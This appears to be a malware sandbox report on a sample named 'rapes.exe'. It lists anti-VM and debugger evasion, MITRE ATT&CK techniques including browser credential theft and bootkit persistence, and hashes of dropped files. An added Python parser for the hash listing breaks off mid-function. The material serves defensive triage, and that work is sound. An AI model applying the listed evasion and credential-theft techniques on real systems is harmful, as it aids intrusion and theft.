C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe 1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1236

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe 1⤵
PID:11464
Network
MITRE ATT&CK Enterprise v15
Execution
- Command and Scripting Interpreter (1)
- PowerShell (1)
- Scheduled Task/Job (1)
- Scheduled Task (1)
- System Services (2)
- Service Execution (2)
Persistence
- Boot or Logon Autostart Execution (2)
- Registry Run Keys / Startup Folder (2)
- Create or Modify System Process (3)
- Windows Service (3)
- Event Triggered Execution (1)
- Netsh Helper DLL (1)
- Modify Authentication Process (1)
- Pre-OS Boot (1)
- Bootkit (1)
- Scheduled Task/Job (1)
- Scheduled Task (1)
Privilege Escalation
- Boot or Logon Autostart Execution (2)
- Registry Run Keys / Startup Folder (2)
- Create or Modify System Process (3)
- Windows Service (3)
- Event Triggered Execution (1)
- Netsh Helper DLL (1)
- Scheduled Task/Job (1)
- Scheduled Task (1)
Defense Evasion
- File and Directory Permissions Modification (1)
- Impair Defenses (2)
- Safe Mode Boot (1)
- Modify Authentication Process (1)
- Modify Registry (5)
- Pre-OS Boot (1)
- Bootkit (1)
- Subvert Trust Controls (1)
- Install Root Certificate (1)
- Virtualization/Sandbox Evasion (2)
Credential Access
- Credentials from Password Stores (1)
- Credentials from Web Browsers (1)
- Modify Authentication Process (1)
- Steal Web Session Cookie (1)
- Unsecured Credentials (4)
- Credentials In Files (4)
Discovery
- Browser Information Discovery (1)
- Peripheral Device Discovery (1)
- Process Discovery (1)
- Query Registry (9)
- Software Discovery (1)
- Security Software Discovery (1)
- System Information Discovery (7)
- System Location Discovery (1)
- System Language Discovery (1)
- Virtualization/Sandbox Evasion (2)
Downloads
-
Filesize
390KB
MD57c924dd4d20055c80007791130e2d03f
SHA1072f004ddcc8ddf12aba64e09d7ee0ce3030973e
SHA256406ab7d6e45dbedcfbd2d7376a643620c7462cece3e41115c8fbc07861177ec6
SHA512ab26005da50cbf1f45129834cb661b5b97aed5637d4ebc9821c8b744ff61c3f108f423ae5628602d99b3d859e184bfb23900797538dca2891186321d832ea806
-
Filesize
1.9MB
MD59719bdd6bda2aa3736d36c284341b793
SHA1d5526134bd3ffcb75ea31d2bf492db37439928f6
SHA2563c8aa9cd25db23f2c9b64554f5e9fe43cbe76c0082e33a1e67ce9d257bb7a179
SHA5124560752c79cf4bbc0a551999df72decaa4da49140c63bfe6cd1c06dd1b11027c47644e45095bd081c95239a661bd93dbcb6996941553d88e3c55cd37c15d04c2
-
Filesize
649B
MD57558714dbcf160f0ba824fd5b2d9f1df
SHA1cd4a4aee3cf41a36de9236610b185673a6856231
SHA256ea41f4d6a79cd6fceda73886b2d72bd0265058ff878b390c672690e351805ae3
SHA5123f3595257fd12b16378fea984de56d6c5226ccf397713a04b968a3fed271a8d1b22c3afc76f9eb35a46d5661b1cb55da6ae7f660ba3d6a768a1242d5a8168a62
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
80KB
MD5add6a1903da88f622a3bf1f0b2f4e722
SHA189cebc9ac98d5e2c8558e8320cc11053815b9c59
SHA2565b45f8be871cb97c4aa636f2820a3d9a721511a317a1e45a518a942b66d556ca
SHA512e83591fa8b9e934f18c798c6381e714d57974284b42cc6ba9de23a62284fce7f434def4b3feadc9a4b8fb19221f4197589c0e243a8dabf3c98b5d95e99767b64
-
Filesize
280B
MD5c37f9d2c357647fca20f2eaa89c18edd
SHA1cfd1035ed2d057c317b48546f467209cbbe15f2e
SHA2562ea3a0b7e6145fd110653b1a77cb827ad7e4a145c29378344bd3d28f595b2072
SHA5123563f4aca9e47f35de8cb38e42a3c0448bb3ec4c9183fa392abc28fee4ca08bf16da028ffbf31cf0c0f8301ed810238961e745590e5c71621bc5a2a889dd12f7
-
Filesize
40KB
MD5dc4aeeda3be664bc87655b4444474905
SHA1b98158a9413159ed96d68949f64f79a52ff12ce3
SHA2561afd2786c2972ed817f1545f173123f708f1221b86dd9fb5af53312cfe8ff480
SHA512ec4eb7a8601cf5f3a6d10f688ae6b1517afd219a759eed3f778b66390532e9b7a14213584d72b7087f2f3fc202140888061dadce1a759ab02626f4f7f14af51e
-
Filesize
16KB
MD59eba88e49e0374f4e12de43638650e58
SHA1b07fadc2b778a8fd9cf21c65b27f2d92a2288b94
SHA256255f54785170bba5629bbef0b194b680393d5675f3b7e855b0b26b1f6b8083bb
SHA512964ef12bfe91f229d546d6ffaed698e32ba5e3e1bad135d4c2b6b685f52546654efed74072722d0e4ca90aa098177688d7f58446ce010be57328c1b313f2a43a
-
Filesize
1.8MB
MD5ac89979dff72902b982fbaff22d04814
SHA1e1aacec04a15d027395fb3b950f90b149b4f8b13
SHA25678ed654b665c1354ddc701fa2cea28c0aef333392468161edd0f0121acad04c3
SHA512f61234181d143999ea5692cc433a8cb97901ed93fdff6be2cb453efb16ccbcefa4143ddc8341a63b444280a001d3afb878f5fce28806ff15fe8f5f7dc0a2e779
-
Filesize
1.4MB
MD506b18d1d3a9f8d167e22020aeb066873
SHA12fe47a3dbcbe589aa64cb19b6bbd4c209a47e5aa
SHA25634b129b82df5d38841dc9978746790673f32273b07922c74326e0752a592a579
SHA512e1f47a594337291cddff4b5febe979e5c3531bd81918590f25778c185d6862f8f7faa9f5e7a35f178edc1666d1846270293472de1fc0775abb8ae10e9bda8066
-
Filesize
1.7MB
MD584408fe8f2675bd4b8eb6fae7dcaeffa
SHA1b0be79ab3ee1ace5da30883a0b5bae5b9ee18a29
SHA25678b08e1acf62ba41b2e41b76baeb269ec6550353fa6d7acd9518b769477696d3
SHA512d64f8f85a1fda98d91481d32b4119f20de6376f58aa8f7dae5cf74344d927d545e701cc410a8bf1dcdd4b14bf320760f57b2697a41b989175c2c4496ca99025d
-
Filesize
1.1MB
MD5b38cd06513a826e8976bb39c3e855f64
SHA179eef674168786ff0762cfdb88a9457f8b518ed5
SHA2562e0b126dd788c027ca69b01335d4a08da28987c3c4296a3523d947da3c12cdc2
SHA5126944ba859359f162e1fc5b2c2b14c7ab1fb9cf5c0a83d7d81d3de722344e8ae3efc300fe369a87d550645de93de4f02ed92c47718cce6fe834fdaa6b543730c9
-
Filesize
1.2MB
MD5398ab46e27982dfd2028bf42f4832fa8
SHA132c00252fc57a6fc31c2b35915f3c8a2061305ca
SHA256033d584799e9ce55c7fc62adb86a6738a42fe2fa5f21035b66ee7b6c4c1fd6e1
SHA512a75fc40c3861048afad124e5b88d164e91b722365305869977f48c20ffa3129e546dd70c68bc6e7c459ec7ad89c94b02cb20e746a2b84a44ab182acf4d971b46
-
Filesize
1.2MB
MD5e3f8c373ee1990eecfc3a762e7f3bc3b
SHA1888b6c33b4f66af32b41c3f0dec1f6c189f61fba
SHA25641b06a71f35f168f8772eb1d2cf420ebcd0afe2259728fd92d5fe4d0ea99ca6a
SHA5123a7f8cd9112ae71a90c168c8501f19d61b92123b67953e70189459ac189b8460dba8686fc850f5afe0a14798891f74a50c9697ea1ce1841ad6941fc0d4806b04
-
Filesize
327KB
MD5f0676528d1fc19da84c92fe256950bd7
SHA160064bc7b1f94c8a2ad24e31127e0b40aff40b30
SHA256493b897d1a54e3aa3f177b49b2529d07cdd791c6d693b6be2f9a4f1144b74a32
SHA512420af976406380e9d1f708f7fc01fc1b9f649f8b7ffaf6607e21c2e6a435880772b8cd7bbff6e76661ddb1fb0e63cba423a60d042d0bcf9aa79058cf2a9cb9d8
-
Filesize
1.7MB
MD5ac8bde872e0a5fad5b498eea445c814a
SHA1c70b5e4b7711ddd6f08c982e8411095b02b18e54
SHA2569dd44670063223ac111bc2bac73773d5d2aea27b74f20ded07fe3713edf30e81
SHA51236212baec6fba22891883435448e9a4ef68385c8fe9c902ccab654ff39be1f0947113eb44aa51f302136ff61b91d9e4a7e495b4da3312b8926d73abd74367d83
-
Filesize
7.5MB
MD5f391dc5c2a7d2b735e53d801978a3887
SHA1fcb208a6f821a1b6f58fb21cae278b4a43775165
SHA256613504a0c04be939c798897104cd1a139bc67b61921f41c7efb0cfb1e4f2cb89
SHA512b55e7f91238ae3a3ba5ae3d4f9eccf390136a40c7c7647cb8fc4b2af23985a20d049ab8e111607c217a8da3a8899673606829ca648049da05ade9c639c814260
-
Filesize
938KB
MD5278fa6cdc2189c33b3cf59614d6d9e7f
SHA1f382716bf5dc31ee6cdac0a1f9890a5164d0c18e
SHA25686fdd59d0050c514f9e4ba5d7431cb65faa7db15f4c9ecbbd0e33b39c78c874a
SHA51276cdd7a6b9e45ae8413f60e0369d045bfd1bfc3e879e0fac54c1303d312813380dc8907aeaf5e6525b47aa9c3768bac99c58fd1f7a2a38f5f193b5d55ebbf9c6
-
Filesize
1KB
MD5cedac8d9ac1fbd8d4cfc76ebe20d37f9
SHA1b0db8b540841091f32a91fd8b7abcd81d9632802
SHA2565e951726842c371240a6af79d8da7170180f256df94eac5966c07f04ef4d120b
SHA512ce383ffef8c3c04983e752b7f201b5df2289af057e819cdf7310a55a295790935a70e6a0784a6fd1d6898564a3babab1ffcfbaa0cc0d36e5e042adeb3c293fa5
-
Filesize
8.4MB
MD5c6067cd3b970c7f932f73f4084df78e8
SHA199ed9789295dc7d28b0e864bc0ab253832c8a871
SHA25676ed4d9fc0972558a1bbc35ae4ff12561715c2bb2f286ae3c359a9671d0911e8
SHA5129a33e1628ed4b2a57229f41e821d21c873d52810be9129128412cb4c12b42ab06c9558a2516b10a1a39b99ab88f46119e53acdeb558ec81c64245a414f0c71f2
-
Filesize
1.2MB
MD5d6ea7e3f4fe6ed3f10591b5d2cfa330e
SHA1a8e4168f3bb2586af3c3b48f24401cfe5e828b53
SHA25694ea263e7adea5df392a68dd41332d718e88c0afec14ee98ebf91fc2f42c586d
SHA512225c07356c88a91d2ba4d32dd55da945fd06f0971885d7d6801fe8d27d85303926425c6fc9dda4877d6050c48c2dd5109d9d6e88d107df72f88b89a29ff61bc8
-
Filesize
2.9MB
MD505335415330e01651dfe13c9a2b33264
SHA1aa827f62879e297c18e600d31015ba1e308a4859
SHA256a91fafb70bb791035f8e8d1cd0d9d955f16d1a5b11f7044b80f2ee6ab0072fd9
SHA5125b57164a1bba13e58517f80fbf3308be3b6d21ee3a8949ee96b00810883094ea3fb8459e03d72d69c200a0112e9e97212323056d0e47da2d4c4cf8c9a95cbfde
-
Filesize
1.7MB
MD5662302d558518c70692ef8f762263178
SHA168412a081023970c1ad3172a3504cfb990acc8ca
SHA256f5fb3e37067d600e066adb47fb1c2db8372cb85ef7817fb5a5b32faba17cc583
SHA5127b9ad9440b7c34872a1ce65c1ea72c2410e5c1a4bf52800d699ab602672ca0f690871d9a4555c99788cd256f7ae5cc23f4661c9cba604187f7667bc2f1bde57e
-
Filesize
945KB
MD5ea6acc6c16dd5dcb0c29b15bff3fb011
SHA1fdee048f39e746b45935c2292c3c87e5788b4269
SHA256a603560ffe0ddb79f2970499814ae01b6c96c9a3deeeeb8aad754ec2e9274564
SHA5120f57c9a65be40dcd04bf82dd91ef2bde3f6a42025b4ffdfa1205393e8444592da620bd58769caf10b06c6c65150cfced4ae02abf36433f541773e3ff4de2c657
-
Filesize
1.6MB
MD50b47891ff6a50e8c44ad945d827e8672
SHA192878611e7aa2f89da1f90b67a65556290dbfbd5
SHA25624eb7e134c87f22c7c209de6700f1e2bccdabe1b1833e0e965abcc33713c8ace
SHA512e7109661b306c5cf8d21c038ac339bfc79970aec9d09808ee9ea3cbc0db541ec36ccf50ca83ddefebc35277e3c009ef63d1de0cd96c1624df2251fface10f116
-
Filesize
88KB
MD589ccc29850f1881f860e9fd846865cad
SHA1d781641be093f1ea8e3a44de0e8bcc60f3da27d0
SHA2564d33206682d7ffc895ccf0688bd5c914e6b914ea19282d14844505057f6ed3e3
SHA5120ed81210dc9870b2255d07ba50066376bcc08db95b095c5413ec86dd70a76034f973b3f396cafcfaf7db8b916ac6d1cbca219900bb9722cb5d5b7ea3c770a502
-
Filesize
52KB
MD5f4dc5211ec6e0136575803b613a53231
SHA147ef36d1018f18f0ed87e04cf1853cd65558691b
SHA2562ad54e07251b0fc0ba8045430898ee6ea1046b4735f901c0010152d4433276ac
SHA5123443eb5bc6abea9cc090b3c8c183f64cdf4ebb9382b2802903ce3d63e98adfb8f1d84dd5d5072fc5bc8da02989737cf1c87b1b890816158eb24f1beb733ef75c
-
Filesize
925KB
MD562d09f076e6e0240548c2f837536a46a
SHA126bdbc63af8abae9a8fb6ec0913a307ef6614cf2
SHA2561300262a9d6bb6fcbefc0d299cce194435790e70b9c7b4a651e202e90a32fd49
SHA51232de0d8bb57f3d3eb01d16950b07176866c7fb2e737d9811f61f7be6606a6a38a5fc5d4d2ae54a190636409b2a7943abca292d6cefaa89df1fc474a1312c695f
-
Filesize
794KB
MD5a6880e9e37b529bb0431cf8baed7dba8
SHA148349c539d38e516e1be11899ea8dcc56340010f
SHA25642597847cdb8fd1b5f45c125835ee4bdb141a447150b2384e8c8ea3e434d7166
SHA51207e6bc76f3bc3f735de1c0a3c32092bf955a39f4b37df49c97005c5a7f3ae701c438cd49ace8eb7aa7af69efa58b93cf2ab8fb9f21ccb495c4fbf8e5f3b9c0c0
-
Filesize
478KB
MD50c4d83aaf13581a8a9b2bad332eec341
SHA117840d606cb0bd1b04a71811b401e14e6d155b33
SHA256fc1f37050dd7089c1356b58737003b9b56247483a643fcefab4e86345701dbe3
SHA5121ccad381fc33da12efea9a76a35c89b055a6ec7c296a2f9d4f31dee17b6eef9dd2f096d985bb6885e710bdc43a86df0187ec58840a72ed2c529dfdadc1e194ee
-
Filesize
86KB
MD5cad57b5592ed1bc660830dd6d45adc15
SHA132369a2fcdfb852d9f302fa680a9748f2b6cc320
SHA2562935ab290a5eea8c46abca4e7894481a8394437a648faf68f596e20fb52ab7c0
SHA5128b121809a3a397b863b1c16686749bcd837a1c50c5b721823b5f6d4199d50de1d944bd0bbe48b2d03a8af9f8616def3f0c5c4b5b11abb06f30de7f16ef9df3f7
-
Filesize
16KB
MD5530381647b9ec246474e47b5fc40a490
SHA19366d6581ae271113005ba57d4cc8bf90b84a3c3
SHA2569b92421057e0e313c341a1e40c81d83f04f3c60a699019000a193218af187d2f
SHA5123c034502a4c4ef59c3faf7ddfc238c46e436dcb074d450a90d2dd0d18970c59465969bc9e8e975248783bd814b7021dfb57286d4f4931b3c09644a27763804a0
-
Filesize
133KB
MD5 fd47acad8759d7c732673acb82b743fb
SHA1 0a8864c5637465201f252a1a0995a389dd7d9862
SHA256 4daf42d09a5c12cc1f04432231c84ccd77021adca9557eb7db8208fa7c03c16e
SHA512 c24fab73d8a98f5fd4128137808eab27afafd59501ffc2bf20078e400635e0dab89737232cddc0823215ba3b3ccc3011380d160e83172202e294f31f0b44ebdb
-
Filesize
133KB
MD5 6746ba5797b80dbc155f530e4b66b3bb
SHA1 3f9e9a109aa2178c755e3a052e5c9bd60734e6f8
SHA256 62302a357a15ed63b0db3f3d82bfe2b6cc6e8905383a26fe203eb22c0ef4e3ba
SHA512 f345dd1150073d5faab1788900a9af943411c32e58ebcfc3de1934e7068d0284df8cee75832eb8ef81f3de7d595d2aeb752a16a4b0f20711983d4fb73d548d13
-
Filesize
141KB
MD5 6d662a7c67d8446259b0bfbf4bc77ca7
SHA1 565e49f16c7e70a009b33bb3a725d8822d86b245
SHA256 e3d83b3533da271a5e33875ee2136f6a1159bb9e4faad0701344c8ed78b5f7d4
SHA512 b6947f93eb8fec3ffb374cf416bca31956604e22ad9e7dd47ac27e550b83d214c2045b9e06bfdaddabcc2a31abf65b65c74e299552b300d162037e8b5c8486a9
-
Filesize
63KB
MD5 1f2346fe63483701db5d1f461c900a57
SHA1 b7338316f39ce53a32a62b2ea8d3567195490123
SHA256 93bfb6f5177647210c2c0613dbdbc50258aff04aa50cba66261ed8f715d8b90a
SHA512 b16c5267c1c4ced920824ebf32640c6206549bdc65abb28eb96840b1270dd8d8e18359e44ccecb43401783c1808fd2249dfaec3ff6f62821aa2ea5aef4783477
-
Filesize
106KB
MD5 894ffc2f0e893d6158f22a064c293fb1
SHA1 c9569d743588bf27027d00c1ad97330afffd5185
SHA256 95ee958e8b264778a138ede8f9f76d5fb2c94c05d824c4b43d6cdd1b783bf36d
SHA512 38b88e60e4e910171eeedfc7777151454ec86faa0e1540018ad25481fd4bd5d24ae363ff736aeda797d460d990119d07b708c6d3ae50f491bc5edcaeae19dda7
-
Filesize
52KB
MD5 206fe2abf11d4fbeb610bdb8d8daede2
SHA1 b75ec9d616026670b68779b10a1f10abc2e9043b
SHA256 edc4166ce9ba15f0d4e62d03a51cc8c663f3db9d1a70e5a7ebdfb2cf5eaa5ffd
SHA512 b0555bb3a698537100eba4cc2ae7b2a39e469baa975e24814bb50a1c010e82a77e653c5d9ca3983bc1e2aa01a990e2a27332fa436a9271131a05c281d58e0e87
-
Filesize
128KB
MD5 5e2d5f5c188f22b02614549ada2d8e05
SHA1 603321e2ed71cb505aecb960d498aa1a4834dc63
SHA256 b5d118dc9625f38f6adbc5b7758d768af6a02e4193a726f0f7f04f223065cbf4
SHA512 9a08536b2e8c54358ac5b760c7c6b3eb7c83f1dfe499b196b56e75b4e16569fe4950f5ec7604b97233dfb571b5feb600c8575d5c53ae65ff53df5094155c908f
-
Filesize
51KB
MD5 c3fe4959b4153796a08667bcfcd7bb94
SHA1 dabda189db4d194c7f9eb26c76c9c9f294d574df
SHA256 883fef00c5b8b2e09062d5fc1f87df7d47e2dcb2163feea2c3fe795e7c3bcffc
SHA512 5a2ebf939e7969d0360f138178fe08790614081143c734be48bdd15110d297917b784424025359d2b2ed342eed2a91d0f121fd060b2a2279cdf15e90c301c000
-
Filesize
52KB
MD5 f1e17750e2dd20e7041fd2ff4afb2514
SHA1 dcfd0841e1dc45bddda809b2abc9b934cdc146d8
SHA256 ebce45cd2b1879c07980dd317d21da5e07203c46dd40a178f024396ee2492bf8
SHA512 03ad016d5c35996805241f6119f7e9ba67409ffefb8525b3b05a0980db268423b1a210c7877a4230e578ec786816984b6d7b1a657e16f34fb7000a94fbbfa634
-
Filesize
140KB
MD5 fc941a0ecd46f8c784fbd46719d8f3af
SHA1 e5e71cc36f16d20e22d04c55c129f09cc55a3b93
SHA256 56558d2970de28944234a0ec4251ab7985c8428022f6bb1295851f54708e0e6f
SHA512 5fdd0c0ce543639a15848a884df396b91bd0b88e05c7c0571192cb86c99e688eaaf0efb5aadac340680cdfe2b6523fd8fd37c366b2022b95541fdc17f241de34
-
Filesize
368B
MD5 42e09fd3cd95e5aa6de6f578c3b00431
SHA1 2157204d64a6c5efe45ba3c7f4ae2205feccaf42
SHA256 f576032e6d0070ac57e56ecf3c3df854f8d7c5f87131ce2bea5d647dd322989d
SHA512 49b64c6b6bc76fca3fb90318ab03092ef2a96f0ce10cb1bc6a8fb9a043b1091bfda957fdc8522d52761c215ab101e00256dfb3abcd71aea7de27ad564d4aed92
-
Filesize
50KB
MD5 406eb9558625ee07b06a64f6dbf39765
SHA1 09fd217e546c9e6871acac2d38a6f1af6577f1e2
SHA256 70511026a5c16ea793d8904f6489bcfb0f6dff3dea26fb3c9ea2d4477ee837dc
SHA512 441574a1425de3e7ab465d75ae115834a10a0d02ba299e52440f41172b8a545163e9e982975e62ddcaa03965bf21d89a3753e2ba82a59c18263bf2a9cfc01e07
-
Filesize
52KB
MD5 4f1710640fe51809404092836313d2cc
SHA1 87dce87d4bda20185f045b4b7422af67fcaf1776
SHA256 71128b41dca71e47b73c6e52f46bd1798d80b135890c60f6b9be26fc3b2803b9
SHA512 a4ed43d64f03dc33c1785e53045c2c5d6a47a98bbe4c00c6618a70d955d0aa4b6d1ea62887cf7b406ab3d6357c48905a729d03faf0ee6294800409a5c8c4fbf7
-
Filesize
99KB
MD5 307e8ae8c2f837ab64caa4f1e2184c44
SHA1 5a2a9f6bb7c65661eac3ef76ae81bca8cd4d7eb7
SHA256 537c6f974b1057de97ba842b97fc2f422ada9ae0b6b229c6e375259b9b4c617a
SHA512 a9d4d995ec0acd7c1fd94a8bde220fc251f252cd47b546efe8f9f659f4ed4ecd313626a6771219587031f743e23a311481ebfffca015ebab05b22def5c37cda4
-
Filesize
53KB
MD5 be673493455e4d2329ec77af5a8988eb
SHA1 3c116949191cd677d028c8f2bfbdfefa1dc4e35f
SHA256 0863b1f31610dfe42e88dd3e35b398384a12a7092a628b06ef6d7f0d5a6fa03c
SHA512 b3c4b7a22dd0800a208589944452ae6c248ca753ffd6e37a79dce598eef1021a7ca52ce1f2362589590343c0dac93c371b306551f34aacbb89bdd379feb611c6
-
Filesize
90KB
MD5 f654d985a7b5597c6a0effa5b765a1e9
SHA1 a43abe4afaf44c50d6391d6a81a28e8537d1d801
SHA256 27956de2234bc936ddf1a5e56541495ca4a9bf8b39d9df3395ef3a00e819d70d
SHA512 e411b65889860425cc1c674019b95e758af4f0869a2ec5f4549816cc5b286556f4472a1500ff6b7496a6a1bd27ef58b9d8c3598bb06ee51300f882844bf4fea3
-
Filesize
74KB
MD5 6dcfac3d2a6202f346939f6bf993bb1e
SHA1 a1285160d19a1ada44ca406b2a8cda07ecbb0e16
SHA256 f568f70ba2a9341937736e24c6796a9dcba94dfadee81de799f95e614c10e552
SHA512 c9e1ac610984c594a7479a7750a19adef4126dad4cb52c7860c54f3792a2e29c0d0d06d28e19c53fc9ba7399de1d51ad460074bce2d418431d10c3132ea7b300
-
Filesize
24KB
MD5 237136e22237a90f7393a7e36092ebbe
SHA1 fb9a31d2fe60dcad2a2d15b08f445f3bd9282d5f
SHA256 89d7a9aaad61abc813af7e22c9835b923e5af30647f772c5d4a0f6168ed5001f
SHA512 822de2d86b6d1f7b952ef67d031028835604969d14a76fc64af3ea15241fdb11e3e014ddd2cd8048b8fc01a416ca1f7ccc54755cb4416d14bbdfe8680e43bd41
-
Filesize
76KB
MD5 bb45b1e87dd1b5af5243a1e288a04401
SHA1 f1be3185a0a4c86b0d325734b56c3fa1e40e4c75
SHA256 e337ec32ebae2fcafc5b134519642c0545ca8d53f3ec586a2215556a9ec62510
SHA512 126c4f1cbffd1e1a28e9e7bc67b05f6dd0fc9fc9848902c73931fd449ee8324f246694cf876d40ebb7622a93eaeebf7ed74bdbd288d4d78f2d168314b9412e95
-
Filesize
28KB
MD5 7011dd4ea366e5b4856821425af62505
SHA1 52dae5b599554c6e30c17d6d56c657e2c2b9f3dc
SHA256 51420577a0088aa2d64f00262a7a0e82e361246c6c437fb6c9d60b453bff8509
SHA512 a9390c12a26e7856a436445ee4f05279421ca3ca97cc847a9013d3255d6714bcf2d6ab122adf2f2207e75c1a1af7684f3205bf34ebc76fb937f5de55ca448966
-
Filesize
95KB
MD5 be1e5883192a4f06520ae7147d9c43c5
SHA1 45761ba0db2c20940b8e8d1b195982e8973e237b
SHA256 8b41188af16d4d5c200a1fbd6fc09523071ee5ddc5ba75c37ff0e7739c8b6a66
SHA512 f44c8cc421de094e73f61871020bce73d1f355aaed7cd77f89c0d550b977446e4fd1fd85eb4de02ff5eb410de93081ddf41e0e0d975ebdd46c9410206e5642d6
-
Filesize
60B
MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
717B
MD5 98c4173578913e4c4b9cd10f8d6d9f51
SHA1 a8ef887ee68fcb2bcf84c5b8b8dfea47cc9207e9
SHA256 e3e447bcefb0aa1bd4de0f24b1af4f97e77e4e8845c3e16c04138b1616516298
SHA512 3962c0252b3594e919bcf3ab4486ec869b71c53cf25f16945848cb3e422835bd902f1ffd611cc0d94bc77dd239dc2378bc283d0792ca933d96c5b7b9536e58ba
-
C:\Users\Admin\AppData\Local\Temp\{007ffd04-f795-4b5a-bf8e-373bfffa4394}\df513079-9927-45c9-969d-fda124fb67ed.cmd
Filesize
695B
MD5 cb5a69840e4a0069cbe7f88c472d94bf
SHA1 8dabe422df5928533757313452c5a23f4eeac289
SHA256 017cf24041ba24bd37d701338e1c8ddfc808dce9e7828c650ef22a3b741d5f31
SHA512 dc596b4d08a7c977509bb2b77b3b469c3e5bb8135bd89d917bc7a86bdc07df8e391ba02ec7a988381a1e2e3bc870f7d4afd39e1a03723b851c6a352bbb2dbc58
-
Filesize
2.6MB
MD5 3fb0ad61548021bea60cdb1e1145ed2c
SHA1 c9b1b765249bfd76573546e92287245127a06e47
SHA256 5d1a788260891c317f9d05b3387e732af908959c5ad4f5a84e7984bee71084f1
SHA512 38269c22fda1fdee5906c2bfdfc19b77b5f6d8da2be939c6d8259b536912f8bc6f261f5c508f47ade8ab591a54aafbfbcc302219820bad19feb78fcc3586d331
-
C:\Users\Admin\AppData\Local\Temp\{05af628d-7e82-459c-857b-141ba889bda8}\crls\c7e6bd7fe0e4965892ad706f0d2f42e88789b8041daf5b3eea9ca41785297798
Filesize
367B
MD5 9cf88048f43fe6b203cf003706d3c609
SHA1 5a9aa718eb5369d640bf6523a7de17c09f8bfb44
SHA256 4bdbe6ea7610c570bc481e23c45c38d61e8b45062e305356108fd21f384b75bb
SHA512 1d0b42f31911ec8bd8eecc333674863794cfa2b97964cb511132f01a98afd0417b35423fb12461b10a786054f144e598f17d7546a1b17acc6c7efbce5f6f619e
-
Filesize
1.3MB
MD5 15bdc4bd67925ef33b926843b3b8154b
SHA1 646af399ef06ac70e6bd43afe0f978f0f51a75fd
SHA256 4f0b2c61bccfd9aa3db301ee4e15607df41ded533757de34c986a0ff25b6246d
SHA512 eac0736a06d0835758318d594d3560ee6be82889020a173463943956dd400d08cf1174a4c722dc45a3f3c034131982f4b19ff27db1163838afbfac37f397eaf8
-
Filesize
368KB
MD5 990442d764ff1262c0b7be1e3088b6d3
SHA1 0b161374074ef2acc101ed23204da00a0acaa86e
SHA256 6c7ccd465090354438b39da8430a5c47e7f24768a5b12ee02fecf8763e77c9e4
SHA512 af3c6dfe32266a9d546f13559dcba7c075d074bdfdaf0e6bf2a8cae787008afa579f0d5f90e0c657dd614bb244a6d95ff8366c14b388e1f4a3ab76cccb23add4
-
Filesize
355KB
MD5 9cfe1ced0752035a26677843c0cbb4e3
SHA1 e8833ac499b41beb6763a684ba60333cdf955918
SHA256 3bdb393dfaa63b9650658d9288a1dc9a62acc0d44c2f5eab9170485356b9b634
SHA512 29e912e7e19f5ca984fb36fc38df87ed9f8eaa1b62fd0c21d75cbc7b7f16a441de3a97c40a813a8989953ff7c4045d6173066be2a6e6140c90325546b3d0773c
-
Filesize
199KB
MD5 424b93cb92e15e3f41e3dd01a6a8e9cc
SHA1 2897ab04f69a92218bfac78f085456f98a18bdd3
SHA256 ccb99a2eeb80cd74cc58691e7af7fce3264b941aea3d777d9e4a950b9e70b82e
SHA512 15e984a761d873eef0ab50f8292fbba771208ff97a57b131441666c6628936c29f8b1f0e04ef8e880f33ef6fccebd20db882997ca3504c9e5ea1db781b9ffb0f
-
Filesize
260KB
MD5 66522d67917b7994ddfb5647f1c3472e
SHA1 f341b9b28ca7ac21740d4a7d20e4477dba451139
SHA256 5da15bcd1ad66b56b73994a073e8f0ff4170b9ed09c575ca1b046a59a01cc8a1
SHA512 921babab093c5bd1e0ec1615c8842081b402a491ecc744613929fa5fafde628cd9bcc1b38b70024a8fa4317aea0b0dce71cd19f44103e50d6ed7a8d9e2a55968
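The dropped-file listing above is what an analyst usually has to turn into a lookup set: dozens of entries, digest labels fused to their hex values by extraction ("MD5f4dc..."), the size sometimes on the same line as its label, and the first entry cut off by a page break. The Python below is an added example, not part of the original sandbox report, that parses that flattened layout into structured records, uses the known digest lengths (32/40/64/128 hex characters) to split fused labels safely, flags incomplete or unparsed entries instead of silently dropping them, and answers the question that matters in triage: which dropped file does the hash in an EDR alert belong to. The separator convention (a lone "-" line between entries) and the Windows-path heuristic are assumptions drawn from this page's layout; the sample input is a constructed excerpt of three entries copied from the listing, kept in the broken form they appear in.

```python
"""Parse a flattened sandbox dropped-files hash listing into records.

Added example, not the sandbox's own code. Assumed layout: entries are
separated by a lone "-" line, a digest label may be fused with its hex
("MD5f4dc..."), and "Filesize" carries its value inline or on the next line.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field
from typing import Optional

# Hex length of each digest the listing carries; used to split fused labels.
DIGEST_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
_UNITS = {"B": 1, "KB": 1024, "MB": 1024 ** 2, "GB": 1024 ** 3}
_HEX = re.compile(r"^[0-9a-fA-F]+$")
_WIN_PATH = re.compile(r"^[A-Za-z]:\\")   # assumption: paths are Windows drive paths


@dataclass
class DroppedFile:
    path: Optional[str] = None                    # only some entries carry a path
    size_bytes: Optional[int] = None
    digests: dict = field(default_factory=dict)   # algorithm -> lowercase hex
    problems: list = field(default_factory=list)  # anything that did not parse cleanly


def parse_size(token: str) -> Optional[int]:
    """'52KB' -> 53248, '2.6MB' -> 2726297, '368B' -> 368; None if unrecognised."""
    m = re.match(r"^(\d+(?:\.\d+)?)\s*([KMG]?B)$", token.strip(), re.I)
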